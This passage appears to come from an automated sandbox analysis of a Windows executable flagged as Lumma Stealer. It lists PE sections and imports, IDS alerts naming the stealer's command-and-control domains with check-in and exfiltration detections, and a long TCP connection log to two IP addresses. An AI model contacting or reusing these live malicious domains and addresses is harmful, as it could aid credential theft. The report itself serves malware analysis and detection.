                                                                                                                                                                                                                                                          .bss0x440000x47e000x47e00611aacf0dd8e35e3bc88a923a4fb8af4False1.0003260869565218data7.9994038851983635IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                          .rsrc0x8c0000x3e80x40093d6519c97ffd7db4a07ab1d2e3304e8False0.43359375data3.2859175893892143IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                          RT_VERSION0x8c0580x390dataEnglishUnited States0.4517543859649123
                                                                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                                                                          KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CloseThreadpoolWork, CompareStringW, CreateFileW, CreateThreadpoolWork, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryWhenCallbackReturns, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitOnceBeginInitialize, InitOnceComplete, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, SubmitThreadpoolWork, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                                                                                                                                                                                          USER32.dllDefWindowProcW
                                                                                                                                                                                                                                                          ADVAPI32.dllEqualPrefixSid
                                                                                                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                          EnglishUnited States
                                                                                                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                          2024-12-22T23:49:57.881651+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.5600241.1.1.153UDP
                                                                                                                                                                                                                                                          2024-12-22T23:49:58.128956+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.5573781.1.1.153UDP
                                                                                                                                                                                                                                                          2024-12-22T23:49:58.518570+01002058360ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat)1192.168.2.5581191.1.1.153UDP
                                                                                                                                                                                                                                                          2024-12-22T23:49:58.998433+01002058370ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat)1192.168.2.5633401.1.1.153UDP
                                                                                                                                                                                                                                                          2024-12-22T23:49:59.374717+01002058362ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat)1192.168.2.5511341.1.1.153UDP
                                                                                                                                                                                                                                                          2024-12-22T23:49:59.769175+01002058354ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat)1192.168.2.5625571.1.1.153UDP
                                                                                                                                                                                                                                                          2024-12-22T23:50:00.095091+01002058376ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat)1192.168.2.5530621.1.1.153UDP
                                                                                                                                                                                                                                                          2024-12-22T23:50:00.322272+01002058358ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat)1192.168.2.5576111.1.1.153UDP
                                                                                                                                                                                                                                                          2024-12-22T23:50:00.544562+01002058374ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat)1192.168.2.5610421.1.1.153UDP
                                                                                                                                                                                                                                                          2024-12-22T23:50:02.489769+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54970523.55.153.106443TCP
                                                                                                                                                                                                                                                          2024-12-22T23:50:03.312525+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.54970523.55.153.106443TCP
                                                                                                                                                                                                                                                          2024-12-22T23:50:04.998606+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549708104.21.66.86443TCP
                                                                                                                                                                                                                                                          2024-12-22T23:50:05.781735+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549708104.21.66.86443TCP
                                                                                                                                                                                                                                                          2024-12-22T23:50:05.781735+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549708104.21.66.86443TCP
                                                                                                                                                                                                                                                          2024-12-22T23:50:07.040341+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549712104.21.66.86443TCP
                                                                                                                                                                                                                                                          2024-12-22T23:50:08.103943+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549712104.21.66.86443TCP
                                                                                                                                                                                                                                                          2024-12-22T23:50:08.103943+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549712104.21.66.86443TCP
                                                                                                                                                                                                                                                          2024-12-22T23:50:09.730127+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549713104.21.66.86443TCP
                                                                                                                                                                                                                                                          2024-12-22T23:50:12.283390+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549715104.21.66.86443TCP
                                                                                                                                                                                                                                                          2024-12-22T23:50:25.800225+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549745104.21.66.86443TCP
                                                                                                                                                                                                                                                          2024-12-22T23:50:28.783946+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549756104.21.66.86443TCP
                                                                                                                                                                                                                                                          2024-12-22T23:50:29.459744+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549756104.21.66.86443TCP
                                                                                                                                                                                                                                                          2024-12-22T23:50:31.163794+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549762104.21.66.86443TCP
                                                                                                                                                                                                                                                          2024-12-22T23:50:31.184304+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.549762104.21.66.86443TCP
                                                                                                                                                                                                                                                          2024-12-22T23:50:39.867758+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549783104.21.66.86443TCP
                                                                                                                                                                                                                                                          2024-12-22T23:50:40.653165+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549783104.21.66.86443TCP
                                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:01.096602917 CET49705443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:01.096721888 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:01.096824884 CET49705443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:01.098067999 CET49705443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:01.098107100 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:02.489650011 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:02.489768982 CET49705443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:02.499094963 CET49705443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:02.499133110 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:02.499373913 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:02.539448023 CET49705443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:02.544462919 CET49705443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:02.591372967 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:03.312517881 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:03.312536955 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:03.312566996 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:03.312582016 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:03.312609911 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:03.312661886 CET49705443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:03.312710047 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:03.312747002 CET49705443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:03.312784910 CET49705443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:03.486246109 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:03.486294031 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:03.486346006 CET49705443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:03.486377954 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:03.486463070 CET49705443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:03.510433912 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:03.510505915 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:03.510529995 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:03.510546923 CET49705443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:03.510592937 CET49705443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:03.511204958 CET49705443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:03.511241913 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:03.511267900 CET49705443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:03.511282921 CET4434970523.55.153.106192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:03.781136990 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:03.781208992 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:03.781339884 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:03.781887054 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:03.781920910 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:04.998505116 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:04.998605967 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:05.002111912 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:05.002132893 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:05.002387047 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:05.009918928 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:05.009980917 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:05.010020018 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:05.781739950 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:05.781826973 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:05.781882048 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:05.782799959 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:05.782814980 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:05.782838106 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:05.782841921 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:05.824282885 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:05.824331045 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:05.824400902 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:05.824863911 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:05.824882030 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:07.040220022 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:07.040340900 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:07.041497946 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:07.041512012 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:07.041837931 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:07.053268909 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:07.053302050 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:07.053355932 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.103945971 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.104007006 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.104059935 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.104103088 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.104120016 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.104146957 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.104187012 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.104191065 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.104240894 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.104249001 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.113692045 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.113764048 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.113775969 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.122108936 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.122186899 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.122226954 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.164457083 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.223295927 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.273861885 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.273895025 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.299438953 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.299490929 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.299518108 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.299526930 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.299623966 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.299631119 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.299644947 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.299705029 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.299947977 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.299964905 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.300009012 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.300017118 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.514091969 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.514209032 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.514323950 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.514789104 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:08.514825106 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:09.729980946 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:09.730127096 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:09.731549978 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:09.731584072 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:09.731931925 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:09.738755941 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:09.738935947 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:09.738991022 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:10.876774073 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:10.877022028 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:10.877237082 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:10.877286911 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:10.877312899 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:11.062669039 CET49715443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:11.062727928 CET44349715104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:11.062931061 CET49715443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:11.063288927 CET49715443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:11.063334942 CET44349715104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:12.283243895 CET44349715104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:12.283390045 CET49715443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:12.285157919 CET49715443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:12.285206079 CET44349715104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:12.285562992 CET44349715104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:12.287364006 CET49715443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:12.287528992 CET49715443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:12.287581921 CET44349715104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:12.287655115 CET49715443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:12.331358910 CET44349715104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:24.335417986 CET44349715104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:24.335721016 CET44349715104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:24.335819006 CET49715443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:24.335942984 CET49715443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:24.335982084 CET44349715104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:24.579026937 CET49745443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:24.579128027 CET44349745104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:24.579282999 CET49745443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:24.579602957 CET49745443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:24.579641104 CET44349745104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:25.800126076 CET44349745104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:25.800225019 CET49745443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:25.801840067 CET49745443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:25.801855087 CET44349745104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:25.802898884 CET44349745104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:25.807099104 CET49745443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:25.807322979 CET49745443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:25.807357073 CET44349745104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:25.807431936 CET49745443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:25.807441950 CET44349745104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:26.766957045 CET44349745104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:26.767299891 CET44349745104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:26.767479897 CET49745443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:26.767766953 CET49745443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:26.767812014 CET44349745104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:27.562633038 CET49756443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:27.562669039 CET44349756104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:27.562757969 CET49756443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:27.563277960 CET49756443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:27.563296080 CET44349756104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:28.783857107 CET44349756104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:28.783946037 CET49756443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:28.785116911 CET49756443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:28.785130978 CET44349756104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:28.785620928 CET44349756104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:28.786763906 CET49756443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:28.786880970 CET49756443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:28.786889076 CET44349756104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:29.459789038 CET44349756104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:29.460015059 CET44349756104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:29.460092068 CET49756443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:29.460165977 CET49756443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:29.460190058 CET44349756104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:29.943731070 CET49762443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:29.943780899 CET44349762104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:29.943916082 CET49762443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:29.944173098 CET49762443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:29.944212914 CET44349762104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:31.163491964 CET44349762104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:31.163794041 CET49762443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:31.164926052 CET49762443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:31.164942026 CET44349762104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:31.165427923 CET44349762104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:31.182574987 CET49762443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:31.183401108 CET49762443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:31.183471918 CET44349762104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:31.183618069 CET49762443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:31.183679104 CET44349762104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:31.183810949 CET49762443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:31.184048891 CET44349762104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:31.184231043 CET49762443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:31.184268951 CET44349762104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:31.184484005 CET49762443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:31.184526920 CET44349762104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:31.184735060 CET49762443192.168.2.5104.21.66.86
